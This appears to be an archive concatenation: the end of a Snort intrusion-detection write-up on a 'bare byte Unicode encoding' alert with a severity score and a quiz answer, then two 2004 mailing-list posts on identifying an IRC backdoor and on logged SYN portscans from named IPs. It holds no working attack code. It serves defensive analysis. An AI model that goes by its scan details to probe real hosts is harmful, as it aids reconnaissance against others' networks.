=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80
TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF
***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:08.302980 10.10.10.165:1703 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42605 IpLen:20 DgmLen:48 DF
******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:09.095015 10.10.10.165:1711 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42615 IpLen:20 DgmLen:48 DF
******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:12.089067 10.10.10.165:1711 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42647 IpLen:20 DgmLen:48 DF
******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Run time for packet processing was 0.750000 seconds

The above information was still not enough to analyse the intruder's attempt, so I merged all the log files into one with the following command.

C:> mergecap -w merge 2003.12.15.1 2003.12.15.2 2003.12.15.3 2003.12.15.4 2003.12.15.5 2003.12.15.6 2003.12.15.7 2003.12.15.8 2003.12.15.9 2003.12.15.10 2003.12.15.11 2003.12.15.12 2003.12.15.13 2003.12.15.14

Then I ran snort again with the same set of rules.
Some of the results that I got are shown below:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.114599 10.10.10.165:2695 -> 192.168.17.68:1
TCP TTL:128 TOS:0x0 ID:21572 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8158842 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.115021 10.10.10.165:2696 -> 192.168.17.68:2
TCP TTL:128 TOS:0x0 ID:21573 IpLen:20 DgmLen:48 DF
******S* Seq: 0x816111F Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.116627 10.10.10.165:2697 -> 192.168.17.68:3
TCP TTL:128 TOS:0x0 ID:21574 IpLen:20 DgmLen:48 DF
******S* Seq: 0x816B61C Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.117195 10.10.10.165:2698 -> 192.168.17.68:4
TCP TTL:128 TOS:0x0 ID:21575 IpLen:20 DgmLen:48 DF
******S* Seq: 0x817B1FC Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.117646 10.10.10.165:2699 -> 192.168.17.68:5
TCP TTL:128 TOS:0x0 ID:21576 IpLen:20 DgmLen:48 DF
******S* Seq: 0x81865D4 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The above are just sample packets. We can tell from the generated packets that the attacker did a TCP port scan and a UDP port scan to identify the open ports of host 192.168.17.68. Once port 80 was found running, the attacker knew that this is a web server. So the attacker was trying to scan the server with, probably, web server scanning tools.

3. Probability the source address was spoofed

An HTTP session requires a complete 3-way handshake.
This packet, however, did not complete the handshake, so it is unlikely that the source IP would be spoofed.

4. Description of attack

[1] Bare byte encoding is an IIS trick that uses non-ASCII chars as valid values in decoding UTF-8 values. This is NOT in the HTTP standard, as all non-ASCII values have to be encoded with a %. Bare byte encoding allows the user to emulate an IIS server and interpret non-standard encodings correctly. There are no legitimate clients that encode UTF-8 this way, since it is non-standard.

For more description of the terms being used:

Unicode is a single unified character set. Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. [5]

UTF-8 is a method to encode characters in Unicode (one of the three common encoding methods). UTF-8 encodes each Unicode character as a variable number of 1 to 4 octets. Using Unicode/UTF-8, you can write in emails and source code things such as mathematics and sciences or different languages.

ASCII - ASCII code is the numerical representation of a character, because computers can only understand numbers. All non-ASCII characters usually get screwed up when output to the browser, such as some special characters or languages. UTF-8 supports ASCII characters but is not very good with non-ASCII characters.

An HTTP connection to the web server will usually start with a request method such as GET or POST. All packets (except for the highlighted one) have started a 3-way handshake by initiating a SYN to the web server. Somehow the highlighted packet was sent to the web server with the ACK flag set and without the request method. This does not follow RFC2616 and triggered the snort rule to alert. Ethereal actually displays this packet as "Continuation", which means there is no request in the packet.

5. Attack mechanism

As I analyzed the combined log, I found that host 10.10.10.165 tried various attacks against host 192.168.17.68, including TCP scan, UDP scan, socks scan and probably a Unicode attack. Usually I would try to obtain correlating evidence from a secondary resource such as the web server to confirm the attack. However, the secondary resource is not available in this case and we only have the snort log for less than 2 hours. With such limitations I would assume that the attack using Unicode, somehow, was used as part of the scanning process, and one of the scanning policies happened to use the non-ASCII character that triggered the snort rule to alert. To confirm my understanding, I set up a web server at home and wrote some e-commerce pages. Then I ran snort with the same rule set and used N-Stealth, an HTTP security scanner, to scan the e-commerce application that I created. N-Stealth used various combinations of possible web application attacks and generated a lot of alerts, including "bare byte Unicode encoding" alerts.

6. Correlations

Bare byte Unicode encoding is considered under the Unicode attack category. The Unicode attack was previously raised by Bruce Schneier at http://www.schneier.com/crypto-gram-0007.html

7. Evidence of active targeting

The attacker was trying to scan for vulnerable hosts. Host 192.168.17.68 was not the key target at first.

8. Severity

Severity = (criticality + lethality) - (system countermeasures + network countermeasures)

Criticality 4: This attack targets the IIS Server, which is a widely used web server worldwide.

Lethality 2: This attack could be part of scanning and DoS. If successful, it could bring down the server. In this case, this server was not the target at first. The attacker performed host scanning to look for vulnerable hosts. The attacker may have succeeded in compromising the server. From the log, there's no sign of the system going down.
System countermeasures 2: The problem of the IIS way of encoding non-ASCII characters cannot be resolved solely by patching. So I give 2.

Network countermeasures 2: Firewalls and routers cannot prevent the Unicode attack that well. So I give 2 for this as well. Unless a specific web application firewall is being used; then I would give a higher rating.

Severity = (4 + 2) - (2 + 2) = 2

9. Defensive recommendation

- Apply necessary patches to prevent known vulnerabilities at the web server or operating system.
- Apply secure programming concepts when developing the web application. Necessary input validation must be in place to filter out characters that will not be needed. In most cases, non-ASCII characters won't be needed for any field.
- Have network measures in place such as properly configured routers, firewalls and IDS.

10. Multiple choice questions

Which web server could be vulnerable to a "bare byte Unicode encoding" attack?
A. IIS
B. Netscape
C. Apache
D. Any web server

Answer: A

From api at epost.de Sat Jul 10 21:24:05 2004
From: api at epost.de (Axel Pettinger)
Date: Sat, 10 Jul 2004 23:24:05 +0200
Subject: [Intrusions] Need help to identify a trojan
References: <020e01c465b9$8268d500$a900a8c0@cybergeneration.com>
Message-ID: <40F05E75.E6B648BD@epost.de>

Maxime Ducharme wrote:
>
> Hi to the list,
> one of our customer's servers has been compromised and I'd
> need help to identify the trojan used.

[snip]

> This file is bound to TCP port 753, and a connection on this
> port outputs this :
> 220 jsdaus Microsoft FTP Service (Version 5.0)

[snip]

> Norton says this file is not infected,

That's correct as - strictly speaking - it isn't "infected" ... ;-)

> but it looks really suspicious,

Unpack the file using UPX and then have a look at it with something like Notepad.

> we already shut down the server for analysis.
> It has been used for
> scanning.
>
> Other hack tools have been found under C:\RECYCLER\speedy.
>
> I'd like to know which kind of trojan it is, and if it has
> self-propagating behavior like some Ago-Gaobot.

I don't know that for sure but I really doubt it. McAfee identifies the file (MD5: ffdbe99a3e614650d93b310a34273d4e) as "application SimpelFTP" - note that it doesn't report it as a trojan, only as a "potentially unwanted application". This certainly sounds a little bit strange because other av scanners identify it as a backdoor trojan variant named "Delf" and the file itself contains the string "Simpel IRC BOT". There seem to be several variants of that "Simpel" program, because the one mentioned in the VGrep virus database obviously cannot be the one you found:

http://www.virusbtn.com/resources/vgrep/vgrep.cgi?terms=SimpelFTP&product=8

Regards,
Axel Pettinger

From Ken.Connelly at uni.edu Sun Jul 11 12:19:00 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Sun, 11 Jul 2004 07:19:00 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LCBRX9QW1G8YDL7A@uni.edu>

The following extracts show the beginning and ending of the scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.

Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.0:3127 SYN ******S*
Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.0:1080 SYN ******S*
Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.0:10080 SYN ******S*
Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.0:3128 SYN ******S*
Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.1:3127 SYN ******S*
Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.1:1080 SYN ******S*
Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.1:10080 SYN ******S*
Jul 10 08:05:17 68.78.100.246:22002 -> xxx.yyy.1.1:3128 SYN ******S*
[...]
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.253:3128 SYN ******S*
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.254:3127 SYN ******S*
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.254:1080 SYN ******S*
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.254:10080 SYN ******S*
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.254:3128 SYN ******S*
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.255:3127 SYN ******S*
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.255:1080 SYN ******S*
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.255:10080 SYN ******S*
Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.255:3128 SYN ******S*
179287

Jul 10 23:48:22 195.120.208.35:1863 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 10 23:48:22 195.120.208.35:1864 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 10 23:48:22 195.120.208.35:1865 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 10 23:48:23 195.120.208.35:1866 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 10 23:48:23 195.120.208.35:1867 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 10 23:48:23 195.120.208.35:1869 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 10 23:48:23 195.120.208.35:1868 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 10 23:48:23 195.120.208.35:1870 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 10 23:55:36 195.120.208.35:2314 -> xxx.yyy.255.219:8000 SYN ******S*
Jul 10 23:55:36 195.120.208.35:2333 -> xxx.yyy.255.238:8000 SYN ******S*
Jul 10 23:55:36 195.120.208.35:2343 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 10 23:55:36 195.120.208.35:2346 -> xxx.yyy.255.251:8000 SYN ******S*
Jul 10 23:55:36 195.120.208.35:2327 -> xxx.yyy.255.232:8000 SYN ******S*
Jul 10 23:55:36 195.120.208.35:2330 -> xxx.yyy.255.235:8000 SYN ******S*
Jul 10 23:55:36 195.120.208.35:2340 -> xxx.yyy.255.245:8000 SYN ******S*
Jul 10 23:55:36 195.120.208.35:2324 -> xxx.yyy.255.229:8000 SYN ******S*
76000

Jul 10 19:06:52 216.55.183.14:3646 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 10 19:06:52 216.55.183.14:3658 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 10 19:06:52 216.55.183.14:3666 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 10 19:06:52 216.55.183.14:3678 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 10 19:06:55 216.55.183.14:3689 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 10 19:06:55 216.55.183.14:3698 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 10 19:06:55 216.55.183.14:3709 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 10 19:06:55 216.55.183.14:3719 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 10 19:22:14 216.55.183.14:1486 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 10 19:22:14 216.55.183.14:1490 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 10 19:22:14 216.55.183.14:1494 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 10 19:22:14 216.55.183.14:1498 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 10 19:22:14 216.55.183.14:1502 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 10 19:22:14 216.55.183.14:1506 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 10 19:22:14 216.55.183.14:1510 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 10 19:22:14 216.55.183.14:1518 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 10 19:22:14 216.55.183.14:1522 -> xxx.yyy.255.254:1433 SYN ******S*
74612
Jul 10 17:47:35 200.32.3.102:3597 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 10 17:47:32 200.32.3.102:3596 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 10 17:47:35 200.32.3.102:3598 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 10 17:47:35 200.32.3.102:3601 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 10 17:47:35 200.32.3.102:3599 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 10 17:47:35 200.32.3.102:3602 -> xxx.yyy.1.8:1433 SYN ******S*
Jul 10 17:47:35 200.32.3.102:3600 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 10 17:47:35 200.32.3.102:3603 -> xxx.yyy.1.9:1433 SYN ******S*
[...]
Jul 10 18:00:16 200.32.3.102:2045 -> xxx.yyy.255.202:1433 SYN ******S*
Jul 10 18:00:16 200.32.3.102:2044 -> xxx.yyy.255.201:1433 SYN ******S*
Jul 10 18:00:16 200.32.3.102:2042 -> xxx.yyy.255.199:1433 SYN ******S*
Jul 10 18:00:16 200.32.3.102:2043 -> xxx.yyy.255.200:1433 SYN ******S*
Jul 10 18:00:16 200.32.3.102:2041 -> xxx.yyy.255.198:1433 SYN ******S*
Jul 10 18:00:16 200.32.3.102:2046 -> xxx.yyy.255.203:1433 SYN ******S*
Jul 10 18:00:16 200.32.3.102:2049 -> xxx.yyy.255.206:1433 SYN ******S*
Jul 10 18:00:17 200.32.3.102:2051 -> xxx.yyy.255.208:1433 SYN ******S*
74308
Jul 10 23:27:33 212.28.150.243:2525 -> xxx.yyy.1.1:3632 SYN ******S*
Jul 10 23:27:33 212.28.150.243:2526 -> xxx.yyy.1.2:3632 SYN ******S*
Jul 10 23:27:33 212.28.150.243:2527 -> xxx.yyy.1.3:3632 SYN ******S*
Jul 10 23:27:35 212.28.150.243:2528 -> xxx.yyy.1.4:3632 SYN ******S*
Jul 10 23:27:35 212.28.150.243:2529 -> xxx.yyy.1.5:3632 SYN ******S*
Jul 10 23:27:35 212.28.150.243:2530 -> xxx.yyy.1.6:3632 SYN ******S*
Jul 10 23:27:35 212.28.150.243:2531 -> xxx.yyy.1.7:3632 SYN ******S*
Jul 10 23:27:35 212.28.150.243:2532 -> xxx.yyy.1.8:3632 SYN ******S*
[...]
Jul 10 23:38:32 212.28.150.243:1405 -> xxx.yyy.255.251:3632 SYN ******S*
Jul 10 23:38:32 212.28.150.243:1402 -> xxx.yyy.255.248:3632 SYN ******S*
Jul 10 23:38:32 212.28.150.243:1399 -> xxx.yyy.255.245:3632 SYN ******S*
Jul 10 23:38:32 212.28.150.243:1406 -> xxx.yyy.255.252:3632 SYN ******S*
Jul 10 23:38:32 212.28.150.243:1403 -> xxx.yyy.255.249:3632 SYN ******S*
Jul 10 23:38:32 212.28.150.243:1407 -> xxx.yyy.255.253:3632 SYN ******S*
Jul 10 23:38:32 212.28.150.243:1404 -> xxx.yyy.255.250:3632 SYN ******S*
Jul 10 23:38:32 212.28.150.243:1401 -> xxx.yyy.255.247:3632 SYN ******S*
73750
Jul 10 13:31:11 216.53.186.31:2158 -> xxx.yyy.1.1:34816 SYN ******S*
Jul 10 13:31:11 216.53.186.31:2159 -> xxx.yyy.1.2:34816 SYN ******S*
Jul 10 13:31:11 216.53.186.31:2160 -> xxx.yyy.1.3:34816 SYN ******S*
Jul 10 13:31:13 216.53.186.31:2161 -> xxx.yyy.1.4:34816 SYN ******S*
Jul 10 13:31:10 216.53.186.31:2162 -> xxx.yyy.1.5:34816 SYN ******S*
Jul 10 13:31:13 216.53.186.31:2163 -> xxx.yyy.1.6:34816 SYN ******S*
Jul 10 13:31:13 216.53.186.31:2164 -> xxx.yyy.1.7:34816 SYN ******S*
Jul 10 13:31:13 216.53.186.31:2165 -> xxx.yyy.1.8:34816 SYN ******S*
[...]
Jul 10 13:42:05 216.53.186.31:1082 -> xxx.yyy.255.142:34816 SYN ******S*
Jul 10 13:42:05 216.53.186.31:1085 -> xxx.yyy.255.145:34816 SYN ******S*
Jul 10 13:42:05 216.53.186.31:1084 -> xxx.yyy.255.144:34816 SYN ******S*
Jul 10 13:42:06 216.53.186.31:1087 -> xxx.yyy.255.147:34816 SYN ******S*
Jul 10 13:42:06 216.53.186.31:1088 -> xxx.yyy.255.148:34816 SYN ******S*
Jul 10 13:42:06 216.53.186.31:1089 -> xxx.yyy.255.149:34816 SYN ******S*
Jul 10 13:42:06 216.53.186.31:1090 -> xxx.yyy.255.150:34816 SYN ******S*
Jul 10 13:42:06 216.53.186.31:1091 -> xxx.yyy.255.151:34816 SYN ******S*
72601
Jul 10 22:54:26 221.149.141.41:1847 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 10 22:54:26 221.149.141.41:1849 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 10 22:54:26 221.149.141.41:1848 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 10 22:54:28 221.149.141.41:1850 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 10 22:54:28 221.149.141.41:1852 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 10 22:54:28 221.149.141.41:1851 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 10 22:54:28 221.149.141.41:1853 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 10 22:54:28 221.149.141.41:1854 -> xxx.yyy.1.8:4899 SYN ******S*
[...]
Jul 10 23:06:07 221.149.141.41:4245 -> xxx.yyy.255.240:4899 SYN ******S*
Jul 10 23:06:07 221.149.141.41:4248 -> xxx.yyy.255.243:4899 SYN ******S*
Jul 10 23:06:07 221.149.141.41:4255 -> xxx.yyy.255.250:4899 SYN ******S*
Jul 10 23:06:07 221.149.141.41:4254 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 10 23:06:07 221.149.141.41:4259 -> xxx.yyy.255.254:4899 SYN ******S*
Jul 10 23:06:07 221.149.141.41:4257 -> xxx.yyy.255.252:4899 SYN ******S*
Jul 10 23:06:07 221.149.141.41:4258 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 10 23:06:07 221.149.141.41:4256 -> xxx.yyy.255.251:4899 SYN ******S*
71495
Jul 10 18:25:07 213.84.51.53:3205 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 10 18:25:10 213.84.51.53:3206 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 10 18:25:10 213.84.51.53:3207 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 10 18:25:10 213.84.51.53:3208 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 10 18:25:10 213.84.51.53:3209 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 10 18:25:10 213.84.51.53:3210 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 10 18:25:10 213.84.51.53:3211 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 10 18:25:10 213.84.51.53:3212 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 10 18:36:50 213.84.51.53:4148 -> xxx.yyy.255.241:1433 SYN ******S*
Jul 10 18:36:50 213.84.51.53:4155 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 10 18:36:50 213.84.51.53:4152 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 10 18:36:50 213.84.51.53:4149 -> xxx.yyy.255.242:1433 SYN ******S*
Jul 10 18:36:50 213.84.51.53:4160 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 10 18:36:50 213.84.51.53:4161 -> xxx.yyy.255.254:1433 SYN ******S*
Jul 10 18:36:50 213.84.51.53:4158 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 10 18:36:50 213.84.51.53:4159 -> xxx.yyy.255.252:1433 SYN ******S*
71035
Jul 10 13:32:11 67.82.97.226:47967 -> xxx.yyy.1.1:4000 SYN ******S*
Jul 10 13:32:11 67.82.97.226:47969 -> xxx.yyy.1.3:4000 SYN ******S*
Jul 10 13:32:13 67.82.97.226:47970 -> xxx.yyy.1.4:4000 SYN ******S*
Jul 10 13:32:10 67.82.97.226:47971 -> xxx.yyy.1.5:4000 SYN ******S*
Jul 10 13:32:13 67.82.97.226:47972 -> xxx.yyy.1.6:4000 SYN ******S*
Jul 10 13:32:13 67.82.97.226:47973 -> xxx.yyy.1.7:4000 SYN ******S*
Jul 10 13:32:13 67.82.97.226:47974 -> xxx.yyy.1.8:4000 SYN ******S*
Jul 10 13:32:13 67.82.97.226:47975 -> xxx.yyy.1.9:4000 SYN ******S*
[...]
Jul 10 13:43:54 67.82.97.226:54537 -> xxx.yyy.255.239:4000 SYN ******S*
Jul 10 13:43:54 67.82.97.226:54543 -> xxx.yyy.255.245:4000 SYN ******S*
Jul 10 13:43:54 67.82.97.226:54540 -> xxx.yyy.255.242:4000 SYN ******S*
Jul 10 13:43:54 67.82.97.226:54548 -> xxx.yyy.255.250:4000 SYN ******S*
Jul 10 13:43:54 67.82.97.226:54552 -> xxx.yyy.255.254:4000 SYN ******S*
Jul 10 13:43:54 67.82.97.226:54549 -> xxx.yyy.255.251:4000 SYN ******S*
Jul 10 13:43:54 67.82.97.226:54550 -> xxx.yyy.255.252:4000 SYN ******S*
Jul 10 13:43:54 67.82.97.226:54546 -> xxx.yyy.255.248:4000 SYN ******S*
Jul 10 13:43:54 67.82.97.226:54547 -> xxx.yyy.255.249:4000 SYN ******S*
70160
Jul 10 01:05:44 202.118.7.130:3459 -> xxx.yyy.1.1:20168 SYN ******S*
Jul 10 01:05:44 202.118.7.130:3460 -> xxx.yyy.1.2:20168 SYN ******S*
Jul 10 01:05:44 202.118.7.130:3461 -> xxx.yyy.1.3:20168 SYN ******S*
Jul 10 01:05:45 202.118.7.130:3462 -> xxx.yyy.1.4:20168 SYN ******S*
Jul 10 01:05:45 202.118.7.130:3463 -> xxx.yyy.1.5:20168 SYN ******S*
Jul 10 01:05:45 202.118.7.130:3464 -> xxx.yyy.1.6:20168 SYN ******S*
Jul 10 01:05:45 202.118.7.130:3465 -> xxx.yyy.1.7:20168 SYN ******S*
Jul 10 01:05:45 202.118.7.130:3466 -> xxx.yyy.1.8:20168 SYN ******S*
[...]
Jul 10 01:17:26 202.118.7.130:2011 -> xxx.yyy.255.201:20168 SYN ******S*
Jul 10 01:17:26 202.118.7.130:2008 -> xxx.yyy.255.198:20168 SYN ******S*
Jul 10 01:17:26 202.118.7.130:2010 -> xxx.yyy.255.200:20168 SYN ******S*
Jul 10 01:17:26 202.118.7.130:2012 -> xxx.yyy.255.202:20168 SYN ******S*
Jul 10 01:17:26 202.118.7.130:2013 -> xxx.yyy.255.203:20168 SYN ******S*
Jul 10 01:17:26 202.118.7.130:2014 -> xxx.yyy.255.204:20168 SYN ******S*
Jul 10 01:17:27 202.118.7.130:2052 -> xxx.yyy.255.242:20168 SYN ******S*
Jul 10 01:17:27 202.118.7.130:2054 -> xxx.yyy.255.244:20168 SYN ******S*
69954
Jul 10 02:30:45 82.192.225.192:1732 -> xxx.yyy.1.1:1257 SYN ******S*
Jul 10 02:30:45 82.192.225.192:1734 -> xxx.yyy.1.2:1257 SYN ******S*
Jul 10 02:30:45 82.192.225.192:1736 -> xxx.yyy.1.3:1257 SYN ******S*
Jul 10 02:30:46 82.192.225.192:1738 -> xxx.yyy.1.4:1257 SYN ******S*
Jul 10 02:30:46 82.192.225.192:1740 -> xxx.yyy.1.5:1257 SYN ******S*
Jul 10 02:30:43 82.192.225.192:1742 -> xxx.yyy.1.6:1257 SYN ******S*
Jul 10 02:30:43 82.192.225.192:1744 -> xxx.yyy.1.7:1257 SYN ******S*
Jul 10 02:30:46 82.192.225.192:1748 -> xxx.yyy.1.9:1257 SYN ******S*
[...]
Jul 10 02:42:43 82.192.225.192:1478 -> xxx.yyy.255.245:1257 SYN ******S*
Jul 10 02:42:43 82.192.225.192:1479 -> xxx.yyy.255.246:1257 SYN ******S*
Jul 10 02:42:43 82.192.225.192:1482 -> xxx.yyy.255.247:1257 SYN ******S*
Jul 10 02:42:43 82.192.225.192:1483 -> xxx.yyy.255.248:1257 SYN ******S*
Jul 10 02:42:43 82.192.225.192:1490 -> xxx.yyy.255.251:1257 SYN ******S*
Jul 10 02:42:43 82.192.225.192:1491 -> xxx.yyy.255.252:1257 SYN ******S*
Jul 10 02:42:43 82.192.225.192:1494 -> xxx.yyy.255.253:1257 SYN ******S*
Jul 10 02:42:43 82.192.225.192:1495 -> xxx.yyy.255.254:1257 SYN ******S*
52139
Jul 10 02:38:15 210.222.146.222:3534 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 10 02:38:15 210.222.146.222:3535 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 10 02:38:15 210.222.146.222:3536 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 10 02:38:14 210.222.146.222:3539 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 10 02:38:14 210.222.146.222:3537 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 10 02:38:14 210.222.146.222:3538 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 10 02:38:14 210.222.146.222:3541 -> xxx.yyy.1.8:4899 SYN ******S*
Jul 10 02:38:14 210.222.146.222:3540 -> xxx.yyy.1.7:4899 SYN ******S*
[...]
Jul 10 02:43:48 210.222.146.222:4868 -> xxx.yyy.254.62:4899 SYN ******S*
Jul 10 02:43:48 210.222.146.222:4847 -> xxx.yyy.254.56:4899 SYN ******S*
Jul 10 02:43:48 210.222.146.222:4876 -> xxx.yyy.254.65:4899 SYN ******S*
Jul 10 02:43:48 210.222.146.222:4877 -> xxx.yyy.254.66:4899 SYN ******S*
Jul 10 02:43:48 210.222.146.222:1062 -> xxx.yyy.254.101:4899 SYN ******S*
Jul 10 02:43:48 210.222.146.222:1061 -> xxx.yyy.254.100:4899 SYN ******S*
Jul 10 02:43:48 210.222.146.222:1063 -> xxx.yyy.254.102:4899 SYN ******S*
Jul 10 02:43:48 210.222.146.222:1060 -> xxx.yyy.254.99:4899 SYN ******S*
Jul 10 02:43:48 210.222.146.222:1064 -> xxx.yyy.254.103:4899 SYN ******S*
44888
Jul 10 02:21:07 24.80.86.102:2502 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 10 02:21:07 24.80.86.102:2503 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 10 02:21:07 24.80.86.102:2504 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 10 02:21:05 24.80.86.102:2505 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 10 02:21:05 24.80.86.102:2507 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 10 02:21:05 24.80.86.102:2508 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 10 02:21:05 24.80.86.102:2509 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 10 02:21:05 24.80.86.102:2510 -> xxx.yyy.1.8:4899 SYN ******S*
[...]
Jul 10 02:25:58 24.80.86.102:1816 -> xxx.yyy.255.247:4899 SYN ******S*
